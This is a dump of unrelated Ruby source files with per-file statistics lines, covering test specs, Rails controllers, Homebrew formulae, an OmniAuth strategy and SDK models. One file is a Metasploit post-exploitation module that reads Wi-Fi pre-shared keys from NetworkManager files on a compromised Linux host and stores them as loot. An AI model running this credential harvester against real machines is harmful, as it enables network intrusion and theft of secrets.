end
end
context 'when the field type is String' do
before do
church.set('name' => 'Church2')
end
it 'sets the field locally' do
expect(church.name).to eq('Church2')
end
it 'sets the field in the database' do
expect(church.reload.name).to eq('Church2')
end
end
context 'when there are two fields of type Hash and String' do
before do
church.set('name' => 'Church2', 'location.street' => 'Yorckstr.')
end
it 'sets the fields locally' do
expect(church.name).to eq('Church2')
expect(church.location).to eq({ 'street' => 'Yorckstr.'})
end
it 'sets the fields in the database' do
expect(church.reload.name).to eq('Church2')
expect(church.reload.location).to eq({ 'street' => 'Yorckstr.'})
end
end
end
end
| 25.671498 | 129 | 0.574802 |
d5dee454b295a36bc3f9d49404a34ab50ca98202 | 63 | module Jekyll
module Compose
VERSION = "0.1.1"
end
end
| 10.5 | 21 | 0.650794 |
8744d21b82f62a3bec7a85dedb805c419d075a21 | 133 | # frozen_string_literal: true
require_relative '../../services/processing_service'
service = ProcessingService.new
service.process
| 19 | 52 | 0.81203 |
39e9482c729b6f8c9dd0dc7a399f81a4824d62bd | 148 | class CoursesController < ApplicationController
skip_before_action :require_user
def index
@courses = Course.all
end
def new
end
end
| 14.8 | 47 | 0.756757 |
7a9c61cb30e4febc22ba2ff557b39f4a3745ce5a | 992 | # frozen_string_literal: true
module V0
module Profile
class PermissionsController < ApplicationController
include Vet360::Writeable
before_action { authorize :vet360, :access? }
after_action :invalidate_cache
def create
write_to_vet360_and_render_transaction!(
'permission',
permission_params
)
end
def update
write_to_vet360_and_render_transaction!(
'permission',
permission_params,
http_verb: 'put'
)
end
def destroy
write_to_vet360_and_render_transaction!(
'permission',
permission_params,
http_verb: 'put'
)
end
private
def permission_params
params.permit(
:effective_start_date,
:id,
:permission_type,
:permission_value,
:source_date,
:transaction_id,
:vet360_id
)
end
end
end
end
| 19.84 | 55 | 0.575605 |
339956b2e48f9ff5163aaed47365980eae891436 | 837 | require 'simple_form_extension/version'
require 'redactor-rails'
require 'selectize-rails'
require 'simple_form'
module SimpleFormExtension
extend ActiveSupport::Autoload
eager_autoload do
autoload :Translations
autoload :ResourceNameHelper
autoload :Components
autoload :Inputs
end
# Allows overriding which methods are used by the fields that try to fetch
# the name of a resource to display it instead of calling #to_s
#
mattr_accessor :resource_name_methods
@@resource_name_methods = [:name, :title]
end
SimpleForm::Inputs::Base.send(:include, SimpleFormExtension::Components::Icons)
SimpleForm::Inputs::Base.send(:include, SimpleFormExtension::Components::Popovers)
SimpleForm.custom_inputs_namespaces << 'SimpleFormExtension::Inputs'
require 'simple_form_extension/railtie' if defined?(Rails)
| 28.862069 | 82 | 0.789725 |
1afa0fbff108bae649a6f4bacf79afcd83f41e28 | 2,940 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Linux Gather 802-11-Wireless-Security Credentials',
'Description' => %q{
This module collects 802-11-Wireless-Security credentials such as
Access-Point name and Pre-Shared-Key from your target CLIENT Linux
machine using /etc/NetworkManager/system-connections/ files.
The module gathers NetworkManager's plaintext "psk" information.
},
'License' => MSF_LICENSE,
'Author' => ['Cenk Kalpakoglu'],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
))
register_options(
[
OptString.new('DIR', [true, 'The default path for network connections',
'/etc/NetworkManager/system-connections/']
)
], self.class)
end
def dir
datastore['DIR']
end
# Extracts AccessPoint name and PSK
def get_psk(data, ap_name)
data.each_line do |l|
if l =~ /^psk=/
psk = l.split('=')[1].strip
return [ap_name, psk]
end
end
nil
end
def extract_all_creds
tbl = Rex::Ui::Text::Table.new({
'Header' => '802-11-wireless-security',
'Columns' => ['AccessPoint-Name', 'PSK'],
'Indent' => 1,
})
files = cmd_exec("/bin/ls -1 #{dir}").chomp.split("\n")
files.each do |f|
file = "#{dir}#{f}"
# TODO: find better (ruby) way
if data = read_file(file)
print_status("Reading file #{file}")
ret = get_psk(data, f)
if ret
tbl << ret
end
end
end
tbl
end
def run
if is_root?
tbl = extract_all_creds
if tbl.rows.empty?
print_status('No PSK has been found!')
else
print_line("\n" + tbl.to_s)
p = store_loot(
'linux.psk.creds',
'text/csv',
session,
tbl.to_csv,
File.basename('wireless_credentials.txt')
)
print_good("Secrets stored in: #{p}")
tbl.rows.each do |cred|
user = cred[0] # AP name
password = cred[1]
create_credential(
workspace_id: myworkspace_id,
origin_type: :session,
address: session.session_host,
session_id: session_db_id,
post_reference_name: self.refname,
username: user,
private_data: password,
private_type: :password,
)
end
print_status("Done")
end
else
print_error('You must run this module as root!')
end
end
end
| 26.017699 | 79 | 0.563946 |
39a987179c40844a5c6705ce03015fb0711142a8 | 1,879 | require 'formula'
class DrupalCodeSniffer < Formula
homepage 'https://drupal.org/project/coder'
version '7.x-2.2'
url "http://ftp.drupal.org/files/projects/coder-#{version}.tar.gz"
head 'http://git.drupal.org/project/coder.git', :branch => '7.x-2.x'
sha1 '9d3591f1035c9b0cd2d406d83a9071f94b826e09'
option 'without-drush-command', "Don't install drush command"
depends_on 'php-code-sniffer'
def phpcs_standards
Formula['php-code-sniffer'].phpcs_standards
end
def drupal_standard_name
'Drupal'
end
def drush_commands
HOMEBREW_PREFIX+'share'+'drush'+'commands'
end
def install
prefix.install 'coder_sniffer'
# Link Drupal Coder Sniffer into PHPCS standards.
phpcs_standards.mkpath
if File.symlink? phpcs_standards+drupal_standard_name
File.delete phpcs_standards+drupal_standard_name
end
phpcs_standards.install_symlink prefix+'coder_sniffer'+drupal_standard_name
# Link Drupal Coder Sniffer into /usr/local/share/drush/commands
# for integration with Drush.
if build.with? 'drush-command'
drush_commands.mkpath
if File.symlink? drush_commands+name
File.delete drush_commands+name
end
drush_commands.install_symlink prefix+'coder_sniffer' => name
end
end
def caveats;
s = ""
s += <<-EOS.undent
Drupal Coder Sniffer is linked to "#{phpcs_standards+drupal_standard_name}".
You can verify whether PHP Code Sniffer has detected the standard by running:
#{Formula['php-code-sniffer'].phpcs_script_name} -i
EOS
if build.with? 'drush-command'
s += <<-EOS.undent
Drupal Coder Sniffer is installed as a drush command in "#{drush_commands+name}".
You can verify whether Drush has discovered the standard by running:
drush drupalcs --help
EOS
end
return s
end
end
| 26.464789 | 91 | 0.702501 |
7a15793805cf2319f29af19a2fd9a01706c06563 | 1,925 | require 'omniauth-google-oauth2'
require 'adwords_api'
module OmniAuth
module Strategies
class GoogleAdwordsOauth2 < OmniAuth::Strategies::GoogleOauth2
option :name, 'google_adwords_oauth2'
option :skip_friends, true
option :authorize_options, [:access_type, :hd, :login_hint, :prompt, :request_visible_actions, :scope, :state, :redirect_uri, :include_granted_scopes]
option :client_options, {
:site => 'https://accounts.google.com',
:authorize_url => '/o/oauth2/auth',
:token_url => '/o/oauth2/token'
}
option :adwords_api_config, 'adwords_api.yml'
option :adwords_api_version, :v201409
def authorize_params
super.tap do |params|
raw_scope = params[:scope]
scope_list = raw_scope.split(" ").map {|item| item.split(",")}.flatten
scope_list << 'adwords' unless scope_list.include?('adwords')
scope_list.map! { |s| s =~ /^https?:\/\// || BASE_SCOPES.include?(s) ? s : "#{BASE_SCOPE_URL}#{s}" }
params[:scope] = scope_list.join(" ")
end
end
extra do
hash = {}
hash[:id_token] = access_token['id_token']
hash[:raw_info] = raw_info
hash[:raw_info][:adwords] = adwords_info
hash[:raw_info][:token] = raw_token || {}
end
attr_accessor :raw_token
def build_access_token
adwords_api.logger = Rails.logger
self.raw_token = adwords_api.authorize(oauth2_callback: callback_url, oauth2_verification_code: request.params['code'])
self.access_token = ::OAuth2::AccessToken.from_hash client, raw_token.dup # dup somehow important!
end
def adwords_info
adwords_api.service(:CustomerService, options.adwords_api_version).get()
end
def adwords_api
@adwords_api ||= AdwordsApi::Api.new options.adwords_api_config
end
end
end
end
| 32.083333 | 156 | 0.64 |
1a7b71b8f0ab7360ee1d2e2dc6c923f15ab84e38 | 1,789 | #!/usr/bin/env ruby
$: << File.dirname(__FILE__)+'/../../lib'
require 'boot'
require 'goliath'
require 'rack/abstract_format'
require 'yajl/json_gem'
#
# Wait the amount of time given by the 'delay' parameter before responding (default 2.5, max 15.0).
#
# Handles multiple parallel requests:
#
# $ ./app/rack/sleepy_simple.rb -sv -p 9002 -e prod &
# [64277:INFO] 2011-04-24 17:17:31 :: Starting server on 0.0.0.0:9002 in development mode. Watch out for stones.
#
# $ ab -c100 -n100 'http://127.0.0.1:9002/?delay=3.0'
#
# Connection Times (ms)
# min mean[+/-sd] median max
# Connect: 5 7 1.0 7 9
# Processing: 3016 3039 16.6 3041 3063
# Waiting: 3015 3038 16.5 3041 3063
# Total: 3022 3046 16.4 3050 3069
#
class SleepySimple < Goliath::API
use Goliath::Rack::Params
use Rack::AbstractFormat, 'application/json'
use Goliath::Rack::Validation::NumericRange, {:key => 'delay', :default => 2.5, :max => 15.0, :min => 0.0, :as => Float}
def response(env)
env[:delay] = env.params['delay']
# EM::Synchrony call allows the reactor to keep spinning: HOORAY CONCURRENCY
logline env, "sleeping"
EM::Synchrony.sleep(env[:delay])
logline env, "after sleep"
logline env, "sending result"
[ 200, { 'X-Sleepy-Delay' => env[:delay].to_s }, JSON.generate(timing_info(env)) ]
end
protected
def timing_info(env)
{
:start => env[:start_time].to_f,
:delay => env[:delay],
:actual => (Time.now.to_f - env[:start_time].to_f)
}
end
def logline env, *args
env.logger.debug( "timer\t%15.4f\t%7.5f\t%3.2f:\t%s" % [env[:start_time], (Time.now.to_f - env[:start_time]), env[:delay], args.join("\t")])
end
end
| 31.946429 | 144 | 0.606484 |
911109e7ed576632ec1454b467b8a5eeb679fb7c | 829 | # Configure Rails Environment
ENV["RAILS_ENV"] = "test"
require_relative "../test/dummy/config/environment"
require "rails/test_help"
Dir["#{File.dirname(__FILE__)}/system/**/*.rb"].each { |f| require f }
# Filter out the backtrace from minitest while preserving the one from other libraries.
Minitest.backtrace_filter = Minitest::BacktraceFilter.new
require "rails/test_unit/reporter"
Rails::TestUnitReporter.executable = 'bin/test'
# Load fixtures from the engine
if ActiveSupport::TestCase.respond_to?(:fixture_path=)
ActiveSupport::TestCase.fixture_path = File.expand_path("fixtures", __dir__)
ActionDispatch::IntegrationTest.fixture_path = ActiveSupport::TestCase.fixture_path
ActiveSupport::TestCase.file_fixture_path = ActiveSupport::TestCase.fixture_path + "/files"
ActiveSupport::TestCase.fixtures :all
end
| 37.681818 | 93 | 0.788902 |
e2e5dd386f21a491f75e1e139148ff731ed95389 | 620 | # frozen_string_literal: true
module Ci
class PipelineBridgeStatusService < ::BaseService
def execute(pipeline)
return unless pipeline.bridge_triggered?
begin
pipeline.source_bridge.inherit_status_from_downstream!(pipeline)
rescue StateMachines::InvalidTransition => e
Gitlab::ErrorTracking.track_exception(
Ci::Bridge::InvalidTransitionError.new(e.message),
bridge_id: pipeline.source_bridge.id,
downstream_pipeline_id: pipeline.id)
end
end
end
end
Ci::PipelineBridgeStatusService.prepend_if_ee('EE::Ci::PipelineBridgeStatusService')
| 29.52381 | 84 | 0.733871 |
1abfe4035326afa5a0ad5d09550935af08e2e31f | 499 | class User < ActiveRecord::Base
has_many :done_list
def self.create_with_omniauth(auth)
#instruction(auth['info']['nickname'])
create! do |user|
user.provider = auth['provider']
user.uid = auth['uid']
user.screen_name = auth['info']['nickname']
user.name = auth['info']['name']
end
end
private
def self.instruction(screen_name)
msg = "#{screen_name}さん、登録ありがとう!登録した時間に「お薬のんだ?」とつぶやきます。のんだら返信してね!"
p msg
#$tw_client.update(msg)
end
end
| 23.761905 | 70 | 0.645291 |
87362a4969cb89040f0a99201bd15c54f7765cd5 | 6,196 | require 'spec_helper'
require './fever_api'
describe FeverAPI do
include Rack::Test::Methods
def app
FeverAPI::Endpoint
end
let(:api_key) { 'apisecretkey' }
let(:story_one) { StoryFactory.build }
let(:story_two) { StoryFactory.build }
let(:feed) { FeedFactory.build }
let(:stories) { [story_one, story_two] }
let(:answer) { { api_version: 3, auth: 1, last_refreshed_on_time: Time.now.to_i } }
let(:headers) { { api_key: api_key } }
before do
user = stub(api_key: api_key)
User.stub(:first).and_return(user)
end
describe "authentication" do
it "authenticates request with correct api_key" do
get "/", headers
last_response.should be_ok
end
it "does not authenticate request with incorrect api_key" do
get "/", api_key: 'foo'
last_response.should_not be_ok
end
it "does not authenticate request when api_key is not provided" do
get "/"
last_response.should_not be_ok
end
end
describe "#get" do
def make_request(extra_headers = {})
get "/", headers.merge(extra_headers)
end
it "returns standart answer" do
make_request
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "returns groups and feeds by groups when 'groups' header is provided" do
FeedRepository.stub(:list).and_return([feed])
make_request({ groups: nil })
answer.merge!({ groups: [{ id: 1, title: "All items" }], feeds_groups: [{ group_id: 1, feed_ids: feed.id.to_s }] })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "returns feeds and feeds by groups when 'feeds' header is provided" do
Feed.stub(:all).and_return([feed])
FeedRepository.stub(:list).and_return([feed])
make_request({ feeds: nil })
answer.merge!({ feeds: [feed.as_fever_json], feeds_groups: [{ group_id: 1, feed_ids: feed.id.to_s }] })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "returns favicons hash when 'favicons' header provided" do
make_request({ favicons: nil })
answer.merge!({ favicons: [{ id: 0, data: "image/gif;base64,R0lGODlhAQABAIAAAObm5gAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" }] })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "returns stories when 'items' header is provided along with 'since_id'" do
StoryRepository.should_receive(:unread_since_id).with('5').and_return([story_one])
StoryRepository.should_receive(:unread).and_return([story_one, story_two])
make_request({ items: nil, since_id: 5 })
answer.merge!({ items: [story_one.as_fever_json], total_items: 2 })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "returns stories when 'items' header is provided without 'since_id'" do
StoryRepository.should_receive(:unread).twice.and_return([story_one, story_two])
make_request({ items: nil })
answer.merge!({ items: [story_one.as_fever_json, story_two.as_fever_json], total_items: 2 })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "returns stories ids when 'items' header is provided along with 'with_ids'" do
StoryRepository.should_receive(:fetch_by_ids).twice.with(['5']).and_return([story_one])
make_request({ items: nil, with_ids: 5 })
answer.merge!({ items: [story_one.as_fever_json], total_items: 1 })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "returns links as empty array when 'links' header is provided" do
make_request({ links: nil })
answer.merge!({ links: [] })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "returns unread items ids when 'unread_item_ids' header is provided" do
StoryRepository.should_receive(:unread).and_return([story_one, story_two])
make_request({ unread_item_ids: nil })
answer.merge!({ unread_item_ids: [story_one.id,story_two.id].join(',') })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "returns starred items when 'saved_item_ids' header is provided" do
Story.should_receive(:where).with({ is_starred: true }).and_return([story_one, story_two])
make_request({ saved_item_ids: nil })
answer.merge!({ saved_item_ids: [story_one.id,story_two.id].join(',') })
last_response.should be_ok
last_response.body.should == answer.to_json
end
end
describe "#post" do
def make_request(extra_headers = {})
post "/", headers.merge(extra_headers)
end
it "commands to mark story as read" do
MarkAsRead.should_receive(:new).with('10').and_return(stub(mark_as_read: true))
make_request({ mark: 'item', as: 'read', id: 10 })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "commands to mark story as unread" do
MarkAsUnread.should_receive(:new).with('10').and_return(stub(mark_as_unread: true))
make_request({ mark: 'item', as: 'unread', id: 10 })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "commands to save story" do
MarkAsStarred.should_receive(:new).with('10').and_return(stub(mark_as_starred: true))
make_request({ mark: 'item', as: 'saved', id: 10 })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "commands to unsave story" do
MarkAsUnstarred.should_receive(:new).with('10').and_return(stub(mark_as_unstarred: true))
make_request({ mark: 'item', as: 'unsaved', id: 10 })
last_response.should be_ok
last_response.body.should == answer.to_json
end
it "commands to mark group as read" do
MarkGroupAsRead.should_receive(:new).with('10', '1375080946').and_return(stub(mark_group_as_read: true))
make_request({ mark: 'group', as: 'read', id: 10, before: 1375080946 })
last_response.should be_ok
last_response.body.should == answer.to_json
end
end
end
| 37.325301 | 133 | 0.683183 |
b951b0a74868b0d8accad6a32d61d827d159841d | 1,526 | # Copyright (c) 2018-2019 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: MIT
# DO NOT MODIFY. THIS CODE IS GENERATED. CHANGES WILL BE OVERWRITTEN.
# vcenter - VMware vCenter Server provides a centralized platform for managing your VMware vSphere environments
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for VSphereAutomation::VCenter::VcenterVchaClusterNodeInfo
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'VcenterVchaClusterNodeInfo' do
before do
# run before each test
@instance = VSphereAutomation::VCenter::VcenterVchaClusterNodeInfo.new
end
after do
# run after each test
end
describe 'test an instance of VcenterVchaClusterNodeInfo' do
it 'should create an instance of VcenterVchaClusterNodeInfo' do
expect(@instance).to be_instance_of(VSphereAutomation::VCenter::VcenterVchaClusterNodeInfo)
end
end
describe 'test attribute "failover_ip"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "ha_ip"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "runtime"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 30.52 | 111 | 0.749017 |
08fe14a7c3af7af29e7ad0718ab776c7d3b60519 | 1,958 | class Datree < Formula
desc "CLI tool to run policies against Kubernetes manifests YAML files or Helm charts"
homepage "https://www.datree.io/"
url "https://github.com/datreeio/datree/archive/1.2.0.tar.gz"
sha256 "ed579d04e500b2963c627b5e03fc34f5ebca40430557d7598ff8c2fe7d42ac6f"
license "Apache-2.0"
head "https://github.com/datreeio/datree.git", branch: "main"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "b9c2f54a6a35259d56826312c6e49623925ca36cc09aeed6b541f23bb91a5fcd"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "1f0f19befb562df4fd0d8f5b4e9732e10537ea0573cda978389a22c60a2a0477"
sha256 cellar: :any_skip_relocation, monterey: "b2b4df75a0a0641138ee336b5618b02b5b853f9202ac0dbacdb19f4635b50c3e"
sha256 cellar: :any_skip_relocation, big_sur: "f03ad58582e57f18f047b4b3b4922c5ac83e2f5621e04943c9cb890fc7ab0a78"
sha256 cellar: :any_skip_relocation, catalina: "536369de079f79c6f306a4412f00102180d08c362614f143047767e2bbe6a4a8"
sha256 cellar: :any_skip_relocation, x86_64_linux: "aa3f1defbc938faac36f4d9a7155fcc47efae222364d5a6372c93e56980c1a59"
end
depends_on "go" => :build
def install
system "go", "build", *std_go_args(ldflags: "-s -w -X github.com/datreeio/datree/cmd.CliVersion=#{version}"), "-tags", "main"
end
test do
(testpath/"invalidK8sSchema.yaml").write <<~EOS
apiversion: v1
kind: Service
metadata:
name: my-service
spec:
selector:
app: MyApp
ports:
- protocol: TCP
port: 80
targetPort: 9376
EOS
assert_match "k8s schema validation error: For field (root): Additional property apiversion is not allowed",
shell_output("#{bin}/datree test #{testpath}/invalidK8sSchema.yaml 2>&1", 2)
assert_equal "#{version}\n", shell_output("#{bin}/datree version")
end
end
| 39.16 | 129 | 0.73238 |
ab11e2a5e6af0ad04b4fc39b7718e6dc4d4e9068 | 845 | cask 'brave-browser-beta' do
version '80.1.7.80,107.80'
sha256 '3e367a226cf197d79cd48b2cdeeea497d21b17bb5c4d325a4331fb25f472ba1a'
# updates-cdn.bravesoftware.com/sparkle/Brave-Browser was verified as official when first introduced to the cask
url "https://updates-cdn.bravesoftware.com/sparkle/Brave-Browser/beta/#{version.after_comma}/Brave-Browser-Beta.dmg"
appcast 'https://updates.bravesoftware.com/sparkle/Brave-Browser/beta/appcast.xml'
name 'Brave Beta'
homepage 'https://brave.com/download-beta/'
auto_updates true
depends_on macos: '>= :mavericks'
app 'Brave Browser Beta.app'
zap trash: [
'~/Library/Application Support/brave',
'~/Library/Preferences/com.electron.brave.plist',
'~/Library/Saved Application State/com.electron.brave.savedState',
]
end
| 38.409091 | 118 | 0.719527 |
1dbc1ffce05a10f160cda7433b011863880764ba | 1,376 | #
# Be sure to run `pod lib lint DcMVVM.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'DcMVVMTest'
s.version = '0.1.0'
s.summary = 'Test tools for DcMVVM.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
Set of protocols, extensions and mocks which help to test MVVM components if DcMVVM framework.
DESC
s.homepage = 'https://github.com/beherith13/DcMVVMTest'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = 'Siarhei Bykau'
s.source = { :git => 'https://github.com/beherith13/DcMVVM.git', :tag => s.version.to_s }
s.ios.deployment_target = '8.0'
s.swift_version = '5.0'
s.subspec "Core" do |sb|
sb.dependency 'DcMVVM/Core'
sb.source_files = "Sources/DcMVVMTest/Core/**/*.swift"
end
s.default_subspecs = 'Core'
end
| 34.4 | 101 | 0.642442 |
6ad634627918d4a4dde098e312b36f0f4ff9f330 | 40 | class Employer < ActiveRecord::Base
end
| 13.333333 | 35 | 0.8 |
f850fd731d3e173a1307abe7de0649920b76d14e | 1,430 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'User sees Security Configuration table', :js do
let_it_be(:user) { create(:user) }
let_it_be(:project) { create(:project, :repository) }
before_all do
project.add_developer(user)
end
before do
sign_in(user)
end
context 'with security_dashboard feature available' do
before do
stub_licensed_features(security_dashboard: true)
end
context 'with no SAST report' do
it 'shows SAST is not enabled' do
visit(project_security_configuration_path(project))
within_sast_row do
expect(page).to have_text('SAST')
expect(page).to have_text('Not enabled')
expect(page).to have_css('[data-testid="enableButton"]')
end
end
end
context 'with SAST report' do
before do
pipeline = create(:ci_pipeline, project: project)
create(:ci_build, :sast, pipeline: pipeline, status: 'success')
end
it 'shows SAST is enabled' do
visit(project_security_configuration_path(project))
within_sast_row do
expect(page).to have_text('SAST')
expect(page).to have_text('Enabled')
expect(page).to have_css('[data-testid="configureButton"]')
end
end
end
end
def within_sast_row
within '[data-testid="security-scanner-row"]:nth-of-type(1)' do
yield
end
end
end
| 24.655172 | 71 | 0.653147 |
39828a7cb958f3a24b35941c5575c3150eea9338 | 206 | require "test_helper"
class YarcsvTest < Test::Unit::TestCase
def test_that_it_has_a_version_number
refute_nil ::Yarcsv::VERSION
end
def test_it_does_something_useful
assert false
end
end
| 17.166667 | 39 | 0.776699 |
4a1a45723c33a461f4780f652ab58a265348c76b | 742 | class Phpmd < Formula
desc "PHP Mess Detector"
homepage "https://phpmd.org"
url "https://github.com/phpmd/phpmd/releases/download/2.8.2/phpmd.phar"
sha256 "0b531cbbc18a26115eede06077d5670e1f4fd0a8545d7fe547adf068fb7f18c5"
bottle :unneeded
def install
bin.install "phpmd.phar" => "phpmd"
end
test do
(testpath/"src/HelloWorld/Greetings.php").write <<~EOS
<?php
namespace HelloWorld;
class Greetings {
public static function sayHelloWorld($name) {
return 'HelloHomebrew';
}
}
EOS
assert_match /Avoid unused parameters such as '\$name'\.$/,
shell_output("#{bin}/phpmd --ignore-violations-on-exit src/HelloWorld/Greetings.php text unusedcode")
end
end
| 26.5 | 107 | 0.680593 |
619fef109af8e28823f0026e42ab5fb341f1b06e | 4,141 | class Hdf5 < Formula
desc "File format designed to store large amounts of data"
homepage "https://www.hdfgroup.org/HDF5"
url "https://support.hdfgroup.org/ftp/HDF5/releases/hdf5-1.12/hdf5-1.12.0/src/hdf5-1.12.0.tar.bz2"
sha256 "97906268640a6e9ce0cde703d5a71c9ac3092eded729591279bf2e3ca9765f61"
license "BSD-3-Clause"
revision 1
livecheck do
url "https://www.hdfgroup.org/downloads/hdf5/"
regex(/Newsletter for HDF5[._-]v?(.*?) Release/i)
end
bottle do
rebuild 1
sha256 cellar: :any_skip_relocation, arm64_big_sur: "2eb3e73920211c3b9f2b8fb3e2bd39d00dfd5069812e3639bb39d4cfe7d78cab"
sha256 cellar: :any_skip_relocation, big_sur: "7cd7cdc13241744c74a94eb578575c357cf263ff0228251a7882a9b7452bac92"
sha256 cellar: :any_skip_relocation, catalina: "ff70299b918490134fb3e883110f0092d591885db3fc798f2cc0f48cd9472f36"
sha256 cellar: :any_skip_relocation, mojave: "450afa0c0e0783b416e67df0d2a56c5f12518df65ba0326884e06f3388c5c445"
sha256 cellar: :any_skip_relocation, high_sierra: "541d0b241a81248d8b6c3d3b205fb3f319e5cefe751d7750aa2749b9696ff749"
sha256 cellar: :any_skip_relocation, x86_64_linux: "50af52d419009a547d5e480925dd6f88817753f6a835b9259bfc036b222f19e0"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "gcc" # for gfortran
depends_on "szip"
uses_from_macos "zlib"
def install
inreplace %w[c++/src/h5c++.in fortran/src/h5fc.in bin/h5cc.in],
"${libdir}/libhdf5.settings",
"#{pkgshare}/libhdf5.settings"
inreplace "src/Makefile.am",
"settingsdir=$(libdir)",
"settingsdir=#{pkgshare}"
system "autoreconf", "-fiv"
args = %W[
--disable-dependency-tracking
--disable-silent-rules
--prefix=#{prefix}
--with-szlib=#{Formula["szip"].opt_prefix}
--enable-build-mode=production
--enable-fortran
--enable-cxx
]
on_linux do
args << "--with-zlib=#{Formula["zlib"].opt_prefix}"
end
system "./configure", *args
# Avoid shims in settings file
on_macos do
inreplace "src/libhdf5.settings", HOMEBREW_LIBRARY/"Homebrew/shims/mac/super/clang", "/usr/bin/clang"
end
on_linux do
gcc_major_ver = Formula["gcc"].any_installed_version.major
inreplace "src/libhdf5.settings", HOMEBREW_LIBRARY/"Homebrew/shims/linux/super/g++-#{gcc_major_ver}",
Formula["gcc"].opt_bin/"g++"
inreplace "src/libhdf5.settings", HOMEBREW_LIBRARY/"Homebrew/shims/linux/super/gcc-#{gcc_major_ver}",
Formula["gcc"].opt_bin/"gcc"
end
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include <stdio.h>
#include "hdf5.h"
int main()
{
printf("%d.%d.%d\\n", H5_VERS_MAJOR, H5_VERS_MINOR, H5_VERS_RELEASE);
return 0;
}
EOS
system "#{bin}/h5cc", "test.c"
assert_equal version.to_s, shell_output("./a.out").chomp
(testpath/"test.f90").write <<~EOS
use hdf5
integer(hid_t) :: f, dspace, dset
integer(hsize_t), dimension(2) :: dims = [2, 2]
integer :: error = 0, major, minor, rel
call h5open_f (error)
if (error /= 0) call abort
call h5fcreate_f ("test.h5", H5F_ACC_TRUNC_F, f, error)
if (error /= 0) call abort
call h5screate_simple_f (2, dims, dspace, error)
if (error /= 0) call abort
call h5dcreate_f (f, "data", H5T_NATIVE_INTEGER, dspace, dset, error)
if (error /= 0) call abort
call h5dclose_f (dset, error)
if (error /= 0) call abort
call h5sclose_f (dspace, error)
if (error /= 0) call abort
call h5fclose_f (f, error)
if (error /= 0) call abort
call h5close_f (error)
if (error /= 0) call abort
CALL h5get_libversion_f (major, minor, rel, error)
if (error /= 0) call abort
write (*,"(I0,'.',I0,'.',I0)") major, minor, rel
end
EOS
system "#{bin}/h5fc", "test.f90"
assert_equal version.to_s, shell_output("./a.out").chomp
end
end
| 35.698276 | 122 | 0.654673 |
38b1ed5337fe1bc633b590000f51dbaabc6e35db | 61 | Chartkick.options = {
colors: ["red", "orange", "green"]
}
| 15.25 | 36 | 0.590164 |
ff033d9b3856a6d58c4101b3067c6bfb9908a666 | 146 | # Be sure to restart your server when you modify this file.
Rails.application.config.session_store :cookie_store, key: '_salesAppServer_session'
| 36.5 | 84 | 0.815068 |
616b219e29c357c614974c8913667ad98fde2ba0 | 7,281 | =begin
#SendinBlue API
#SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.18
=end
require 'date'
module SibApiV3Sdk
class GetContactCampaignStatsUnsubscriptions
# Contact has unsubscribed via the unsubscription link in the email
attr_accessor :user_unsubscription
# Contact has been unsubscribed from the administrator
attr_accessor :admin_unsubscription
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'user_unsubscription' => :'userUnsubscription',
:'admin_unsubscription' => :'adminUnsubscription'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'user_unsubscription' => :'Array<GetExtendedContactDetailsStatisticsUnsubscriptionsUserUnsubscription>',
:'admin_unsubscription' => :'Array<GetExtendedContactDetailsStatisticsUnsubscriptionsAdminUnsubscription>'
}
end
# Initializes the object
